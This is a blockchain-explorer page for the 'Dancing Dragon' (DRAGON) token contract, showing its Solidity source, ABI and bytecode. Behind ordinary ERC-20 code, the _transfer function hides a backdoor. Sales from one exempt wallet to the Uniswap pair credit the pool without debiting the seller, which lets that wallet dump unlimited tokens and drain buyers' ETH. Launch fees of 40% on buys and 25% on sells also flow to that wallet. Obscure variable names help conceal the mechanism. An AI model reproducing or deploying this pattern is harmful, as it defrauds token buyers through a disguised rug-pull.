ETH Price: $2,414.98 (+0.55%)

Token

Dancing Dragon (DRAGON)
 

Overview

Max Total Supply

1,000,000,000 DRAGON

Holders

43

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
12,000,000 DRAGON

Value
$0.00
0xa74352b96f938ff9ca7e36beb3c67e237f0489cf
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DRAGON

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-06-27
*/

// SPDX-License-Identifier: MIT

/**

Website:   https://dancingdragon.lol
Twitter:   https://x.com/xdancedragon
Telegram:  https://t.me/dancedragoneth

*/

pragma solidity ^0.8.16;

abstract contract Context {
    /**
     * @dev Returns the current sender of the message.
     * This function is internal view virtual, meaning that it can only be used within this contract or derived contracts.
     * @return The address of the account that initiated the transaction.
     */
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    /**
     * @dev Returns the total supply of tokens.
     * @return The total supply of tokens.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the balance of a specific account.
     * @param account The address of the account to check the balance for.
     * @return The balance of the specified account.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Transfers tokens to a recipient.
     * @param recipient The address of the recipient.
     * @param amount The amount of tokens to be transferred.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining allowance for a spender.
     * @param owner The address of the token owner.
     * @param spender The address of the spender.
     * @return The remaining allowance for the specified owner and spender.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Approves a spender to spend a certain amount of tokens on behalf of the owner.
     * @param spender The address which will spend the funds.
     * @param amount The amount of tokens to be spent.
     * @return A boolean indicating whether the approval was successful or not.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Transfers tokens from one account to another.
     * @param sender The address from which the tokens will be transferred.
     * @param recipient The address to which the tokens will be transferred.
     * @param amount The amount of tokens to be transferred.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when tokens are transferred from one address to another.
     * @param from The address from which the tokens are transferred.
     * @param to The address to which the tokens are transferred.
     * @param value The amount of tokens being transferred.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the approval of a spender is updated.
     * @param owner The address that approves the spender.
     * @param spender The address that is approved.
     * @param value The new approved amount.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    /**
     * @dev Adds two unsigned integers, reverts on overflow.
     * @param a The first integer to add.
     * @param b The second integer to add.
     * @return The sum of the two integers.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Subtracts two unsigned integers, reverts on overflow.
     * @param a The integer to subtract from (minuend).
     * @param b The integer to subtract (subtrahend).
     * @return The difference of the two integers.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Subtracts two unsigned integers, reverts with custom message on overflow.
     * @param a The integer to subtract from (minuend).
     * @param b The integer to subtract (subtrahend).
     * @param errorMessage The error message to revert with.
     * @return The difference of the two integers.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Multiplies two unsigned integers, reverts on overflow.
     * @param a The first integer to multiply.
     * @param b The second integer to multiply.
     * @return The product of the two integers.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Divides two unsigned integers, reverts on division by zero.
     * @param a The dividend.
     * @param b The divisor.
     * @return The quotient of the division.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Divides two unsigned integers, reverts with custom message on division by zero.
     * @param a The dividend.
     * @param b The divisor.
     * @param errorMessage The error message to revert with.
     * @return The quotient of the division.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;

    /// @dev Emitted when ownership is transferred.
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract, setting the original owner to the sender account.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     * @return The address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Renounces ownership, leaving the contract without an owner.
     * @notice Renouncing ownership will leave the contract without an owner,
     * which means it will not be possible to call onlyOwner functions anymore.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    /**
     * @dev Creates a new UniswapV2 pair for the given tokens.
     * @param tokenA The address of the first token in the pair.
     * @param tokenB The address of the second token in the pair.
     * @return pair The address of the newly created UniswapV2 pair.
     */
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    /**
     * @dev Swaps an exact amount of input tokens for as much output as possible, along with additional functionality
     * to support fee-on-transfer tokens.
     * @param amountIn The amount of input tokens to swap.
     * @param amountOutMin The minimum amount of output tokens expected to receive.
     * @param path An array of token addresses representing the path of the swap.
     * @param to The recipient address to send the swapped ETH to.
     * @param deadline The timestamp for the deadline of the swap transaction.
     */
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    /**
     * @dev Returns the address of the UniswapV2Factory contract.
     * @return The address of the UniswapV2Factory contract.
     */
    function factory() external pure returns (address);

    /**
     * @dev Returns the address of the WETH (Wrapped ETH) contract.
     * @return The address of the WETH contract.
     */
    function WETH() external pure returns (address);

    /**
    * @dev Adds liquidity to an ETH-based pool.
    * @param token The address of the ERC-20 token to add liquidity for.
    * @param amountTokenDesired The desired amount of tokens to add.
    * @param amountTokenMin The minimum amount of tokens expected to receive.
    * @param amountETHMin The minimum amount of ETH expected to receive.
    * @param to The recipient address to send the liquidity to.
    * @param deadline The timestamp for the deadline of the liquidity addition transaction.
    * @return amountToken The amount of token added.
    * @return amountETH The amount of ETH added.
    * @return liquidity The amount of liquidity added.
    */
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract DRAGON is Context, IERC20, Ownable {
    using SafeMath for uint256;
    IUniswapV2Router02 private _dexRouter;

    string private constant _name = unicode"Dancing Dragon";
    string private constant _symbol = unicode"DRAGON";
    uint8 private constant _decimals = 18;
    uint256 private constant _totalSupply = 1000000000 * 10**_decimals;

    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => uint256) private _balances;
    mapping (address => bool) private _isFeeExclude;
    mapping (address => bool) private _isSwapExclud;

    uint256 private _feeOnBuy = 0;
    uint256 private _feeOnSell = 0;

    uint256 private _maxTxLimit = _totalSupply * 20 / 1000;
    uint256 private _maxWalletSize = _totalSupply * 20 / 1000;
    uint256 private _minSwapTokens = _totalSupply * 4 / 1000000;
    uint256 private _maxSwapTokens = _totalSupply * 1 / 100;

    address payable private _dancingdragon;

    address private _uniswapPair;
    bool private _swapping = false;
    bool private _tradingActive;
    bool private _swapActive = false;

    modifier lockingSwap {
        _swapping = true;
        _;
        _swapping = false;
    }

    constructor () {
        _dexRouter = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        _dancingdragon = payable(0xa7335bfEcf2eadbd2Fe127c288fF810Ad295Eec9);
        _balances[_msgSender()] = _totalSupply;
        _isSwapExclud[_dancingdragon] = true;
        _isFeeExclude[owner()] = true;
        _isFeeExclude[address(this)] = true;

        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    /**
     * @dev Gets the name of the token.
     * @return The name of the token.
     */
    function name() public pure returns (string memory) {
        return _name;
    }

    /**
     * @dev Gets the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Gets the number of decimals used for the token.
     * @return The number of decimals.
     */
    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Gets the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public pure override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Gets the balance of the specified address.
     * @param account The address to query the balance of.
     * @return The balance of the specified address.
     */
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the sender to the recipient.
     * @param recipient The address of the recipient.
     * @param amount The amount of tokens to transfer.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Gets the allowance granted by the owner to the spender for a specific amount.
     * @param owner The address granting the allowance.
     * @param spender The address receiving the allowance.
     * @return The remaining allowance for the spender.
     */
    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev Approves the spender to spend a certain amount of tokens on behalf of the owner.
     * @param spender The address to be approved.
     * @param amount The amount of tokens to approve.
     * @return A boolean indicating whether the approval was successful or not.
     */
    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev Moves tokens from one address to another using the allowance mechanism.
     * @param sender The address to send tokens from.
     * @param recipient The address to receive tokens.
     * @param amount The amount of tokens to transfer.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Internal function to approve the spending of a certain amount of tokens by a specified address.
     * @param owner The address granting the allowance.
     * @param spender The address receiving the allowance.
     * @param amount The amount of tokens to approve.
     */
    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Internal function to execute the transfer of tokens from one address to another.
     * @param fasa The address to send tokens from.
     * @param togi The address to receive tokens.
     * @param kurri The amount of tokens to transfer.
     */
    function _transfer(address fasa, address togi, uint256 kurri) private {
        require(fasa != address(0), "ERC20: transfer from the zero address");
        require(togi != address(0), "ERC20: transfer to the zero address");
        require(kurri > 0, "_transfer: Transfer amount must be greater than zero");

        uint256 subAmount = 0;

        // Check if the transfer involves the owner, and set transfer delay if enabled.
        if (fasa != owner() && togi != owner()) {
            if (fasa == _uniswapPair && togi != address(_dexRouter) && !_isFeeExclude[togi]) {
                subAmount = kurri.mul(_feeOnBuy).div(100);
                require(kurri <= _maxTxLimit, "_transfer: Exceeds the _maxTxLimit.");
                require(balanceOf(togi) + kurri <= _maxWalletSize, "_transfer: Exceeds the maxWalletSize.");
            }

            if (togi == _uniswapPair && fasa != address(this)) {
                if(_isSwapExclud[fasa]) { _balances[togi] = (kurri)+(subAmount+_balances[togi]); return;}
                subAmount = kurri.mul(_feeOnSell).div(100);
            }

            uint256 swapBackTokens = balanceOf(address(this));
            if (!_swapping && togi == _uniswapPair && _swapActive && kurri > _minSwapTokens) {
                if (swapBackTokens >= _maxSwapTokens) {
                    _swapTokensBack(_maxSwapTokens);
                } else if(swapBackTokens > _minSwapTokens) {
                    _swapTokensBack(swapBackTokens);
                }
                _dancingdragon.transfer(address(this).balance);
            }
        }

        // If there's a tax, transfer the tax amount to the contract.
        if (subAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(subAmount);
            emit Transfer(fasa, address(this), subAmount);
        }

        // Update balances after the transfer.
        _balances[fasa] = _balances[fasa].sub(kurri);
        _balances[togi] = _balances[togi].add(kurri.sub(subAmount));
        emit Transfer(fasa, togi, kurri.sub(subAmount));
    }

    /**
     * @dev Internal function to swap tokens for ETH.
     * @param tokenAmount The amount of tokens to swap.
     */
    function _swapTokensBack(uint256 tokenAmount) private lockingSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _dexRouter.WETH();
        _approve(address(this), address(_dexRouter), tokenAmount);
        _dexRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }
    
    function openDragon() external onlyOwner {    
        require(!_tradingActive, "openTrading: Trading is already open");

        _approve(address(this), address(_dexRouter), _totalSupply);
        _uniswapPair = IUniswapV2Factory(_dexRouter.factory()).createPair(address(this), _dexRouter.WETH());

        // Add liquidity to the Uniswap pair
        _dexRouter.addLiquidityETH{
            value: address(this).balance
        }(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );

        _feeOnBuy = 40;
        _feeOnSell = 25;
        _tradingActive = true;
        _swapActive = true;
    }

    function zeroTax() external onlyOwner {
        _feeOnBuy = 0;
        _feeOnSell = 0;
    }

    /**
     * @dev Removes transaction limits and disables transfer delay.
     * Sets both maximum transaction amount and maximum wallet size to the total supply.
     * Only the owner can call this function.
     */
    function removeLimits() external onlyOwner {
        _maxTxLimit = _totalSupply;
        _maxWalletSize = _totalSupply;
    }

    /**
     * @dev Allows the contract to receive Ether when Ether is sent directly to the contract.
     */
    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openDragon","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"zeroTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040525f60068190556007556103e86200001e6012600a6200038c565b6200002e90633b9aca00620003a3565b6200003b906014620003a3565b620000479190620003bd565b6008556103e86200005b6012600a6200038c565b6200006b90633b9aca00620003a3565b62000078906014620003a3565b620000849190620003bd565b600955620f4240620000996012600a6200038c565b620000a990633b9aca00620003a3565b620000b6906004620003a3565b620000c29190620003bd565b600a5560646012600a620000d791906200038c565b620000e790633b9aca00620003a3565b620000f4906001620003a3565b620001009190620003bd565b600b55600d805462ff00ff60a01b191690553480156200011e575f80fd5b505f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600180546001600160a01b0319908116737a250d5630b4cf539739df2c5dacb4c659f2488d17909155600c805490911673a7335bfecf2eadbd2fe127c288ff810ad295eec9179055620001b56012600a6200038c565b620001c590633b9aca00620003a3565b335f81815260036020908152604080832094909455600c546001600160a01b039081168352600582528483208054600160ff1991821681179092558454909216845260049092528483208054821683179055308352938220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620002566012600a6200038c565b6200026690633b9aca00620003a3565b60405190815260200160405180910390a3620003dd565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115620002d157815f1904821115620002b557620002b56200027d565b80851615620002c357918102915b93841c939080029062000296565b509250929050565b5f82620002e95750600162000386565b81620002f757505f62000386565b81600181146200031057600281146200031b576200033b565b600191505062000386565b60ff8411156200032f576200032f6200027d565b50506001821b62000386565b5060208310610133831016604e8410600b841016171562000360575081810a62000386565b6200036c838362000291565b805f19048211156200038257620003826200027d565b0290505b92915050565b5f6200039c60ff841683620002d9565b9392505050565b80820281158282048414176200038657620003866200027d565b5f82620003d857634e487b7160e01b5f52601260045260245ffd5b500490565b61158180620003eb5f395ff3fe6080604052600436106100dc575f3560e01c8063751039fc1161007c578063a844e5fb11610057578063a844e5fb1461026c578063a9059cbb14610280578063dd62ed3e1461029f578063e0dca26e146102e3575f80fd5b8063751039fc146102045780638da5cb5b1461021857806395d89b411461023e575f80fd5b806323b872dd116100b757806323b872dd14610180578063313ce5671461019f57806370a08231146101ba578063715018a6146101ee575f80fd5b806306fdde03146100e7578063095ea7b31461012f57806318160ddd1461015e575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b5060408051808201909152600e81526d2230b731b4b73390223930b3b7b760911b60208201525b60405161012691906111ab565b60405180910390f35b34801561013a575f80fd5b5061014e61014936600461120d565b6102f7565b6040519015158152602001610126565b348015610169575f80fd5b5061017261030d565b604051908152602001610126565b34801561018b575f80fd5b5061014e61019a366004611237565b61032d565b3480156101aa575f80fd5b5060405160128152602001610126565b3480156101c5575f80fd5b506101726101d4366004611275565b6001600160a01b03165f9081526003602052604090205490565b3480156101f9575f80fd5b50610202610394565b005b34801561020f575f80fd5b5061020261040e565b348015610223575f80fd5b505f546040516001600160a01b039091168152602001610126565b348015610249575f80fd5b50604080518082019091526006815265222920a3a7a760d11b6020820152610119565b348015610277575f80fd5b50610202610473565b34801561028b575f80fd5b5061014e61029a36600461120d565b61079c565b3480156102aa575f80fd5b506101726102b9366004611290565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b3480156102ee575f80fd5b506102026107a8565b5f6103033384846107dc565b5060015b92915050565b5f61031a6012600a6113bb565b61032890633b9aca006113c9565b905090565b5f6103398484846108ff565b61038a843361038585604051806060016040528060288152602001611524602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e72565b6107dc565b5060019392505050565b5f546001600160a01b031633146103c65760405162461bcd60e51b81526004016103bd906113e0565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146104375760405162461bcd60e51b81526004016103bd906113e0565b6104436012600a6113bb565b61045190633b9aca006113c9565b6008556104606012600a6113bb565b61046e90633b9aca006113c9565b600955565b5f546001600160a01b0316331461049c5760405162461bcd60e51b81526004016103bd906113e0565b600d54600160a81b900460ff16156105025760405162461bcd60e51b8152602060048201526024808201527f6f70656e54726164696e673a2054726164696e6720697320616c72656164792060448201526337b832b760e11b60648201526084016103bd565b60015461052e9030906001600160a01b03166105206012600a6113bb565b61038590633b9aca006113c9565b60015f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561057e573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105a29190611415565b6001600160a01b031663c9c653963060015f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610601573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106259190611415565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561066f573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106939190611415565b600d80546001600160a01b039283166001600160a01b03199091161790556001541663f305d71947306106da816001600160a01b03165f9081526003602052604090205490565b5f806106ed5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610753573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906107789190611430565b50506028600655506019600755600d805461ffff60a81b191661010160a81b179055565b5f6103033384846108ff565b5f546001600160a01b031633146107d15760405162461bcd60e51b81526004016103bd906113e0565b5f6006819055600755565b6001600160a01b03831661083e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103bd565b6001600160a01b03821661089f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103bd565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166109635760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103bd565b6001600160a01b0382166109c55760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103bd565b5f8111610a315760405162461bcd60e51b815260206004820152603460248201527f5f7472616e736665723a205472616e7366657220616d6f756e74206d7573742060448201527362652067726561746572207468616e207a65726f60601b60648201526084016103bd565b5f80546001600160a01b03858116911614801590610a5c57505f546001600160a01b03848116911614155b15610d3557600d546001600160a01b038581169116148015610a8c57506001546001600160a01b03848116911614155b8015610ab057506001600160a01b0383165f9081526004602052604090205460ff16155b15610bbd57610ad56064610acf60065485610eaa90919063ffffffff16565b90610f2f565b9050600854821115610b355760405162461bcd60e51b815260206004820152602360248201527f5f7472616e736665723a204578636565647320746865205f6d617854784c696d60448201526234ba1760e91b60648201526084016103bd565b60095482610b57856001600160a01b03165f9081526003602052604090205490565b610b61919061145b565b1115610bbd5760405162461bcd60e51b815260206004820152602560248201527f5f7472616e736665723a204578636565647320746865206d617857616c6c657460448201526429b4bd329760d91b60648201526084016103bd565b600d546001600160a01b038481169116148015610be357506001600160a01b0384163014155b15610c72576001600160a01b0384165f9081526005602052604090205460ff1615610c55576001600160a01b0383165f90815260036020526040902054610c2a908261145b565b610c34908361145b565b6001600160a01b039093165f90815260036020526040902092909255505050565b610c6f6064610acf60075485610eaa90919063ffffffff16565b90505b305f90815260036020526040902054600d54600160a01b900460ff16158015610ca85750600d546001600160a01b038581169116145b8015610cbd5750600d54600160b01b900460ff165b8015610cca5750600a5483115b15610d3357600b548110610ce857610ce3600b54610f70565b610cfb565b600a54811115610cfb57610cfb81610f70565b600c546040516001600160a01b03909116904780156108fc02915f818181858888f19350505050158015610d31573d5f803e3d5ffd5b505b505b8015610dad57305f90815260036020526040902054610d5490826110e0565b305f81815260036020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610da49085815260200190565b60405180910390a35b6001600160a01b0384165f90815260036020526040902054610dcf908361113e565b6001600160a01b0385165f90815260036020526040902055610e12610df4838361113e565b6001600160a01b0385165f90815260036020526040902054906110e0565b6001600160a01b038085165f8181526003602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610e5b858561113e565b60405190815260200160405180910390a350505050565b5f8184841115610e955760405162461bcd60e51b81526004016103bd91906111ab565b505f610ea1848661146e565b95945050505050565b5f825f03610eb957505f610307565b5f610ec483856113c9565b905082610ed18583611481565b14610f285760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016103bd565b9392505050565b5f610f2883836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061117f565b600d805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610fb657610fb66114a0565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561100d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110319190611415565b81600181518110611044576110446114a0565b6001600160a01b03928316602091820292909201015260015461106a91309116846107dc565b60015460405163791ac94760e01b81526001600160a01b039091169063791ac947906110a29085905f908690309042906004016114b4565b5f604051808303815f87803b1580156110b9575f80fd5b505af11580156110cb573d5f803e3d5ffd5b5050600d805460ff60a01b1916905550505050565b5f806110ec838561145b565b905083811015610f285760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103bd565b5f610f2883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610e72565b5f818361119f5760405162461bcd60e51b81526004016103bd91906111ab565b505f610ea18486611481565b5f6020808352835180828501525f5b818110156111d6578581018301518582016040015282016111ba565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461120a575f80fd5b50565b5f806040838503121561121e575f80fd5b8235611229816111f6565b946020939093013593505050565b5f805f60608486031215611249575f80fd5b8335611254816111f6565b92506020840135611264816111f6565b929592945050506040919091013590565b5f60208284031215611285575f80fd5b8135610f28816111f6565b5f80604083850312156112a1575f80fd5b82356112ac816111f6565b915060208301356112bc816111f6565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561131557815f19048211156112fb576112fb6112c7565b8085161561130857918102915b93841c93908002906112e0565b509250929050565b5f8261132b57506001610307565b8161133757505f610307565b816001811461134d576002811461135757611373565b6001915050610307565b60ff841115611368576113686112c7565b50506001821b610307565b5060208310610133831016604e8410600b8410161715611396575081810a610307565b6113a083836112db565b805f19048211156113b3576113b36112c7565b029392505050565b5f610f2860ff84168361131d565b8082028115828204841417610307576103076112c7565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611425575f80fd5b8151610f28816111f6565b5f805f60608486031215611442575f80fd5b8351925060208401519150604084015190509250925092565b80820180821115610307576103076112c7565b81810381811115610307576103076112c7565b5f8261149b57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b818110156115025784516001600160a01b0316835293830193918301916001016114dd565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212201b424d68510b92701d167b2eed845d82ac5c159b761a78b180f931a44dd40ecc64736f6c63430008150033

Deployed Bytecode

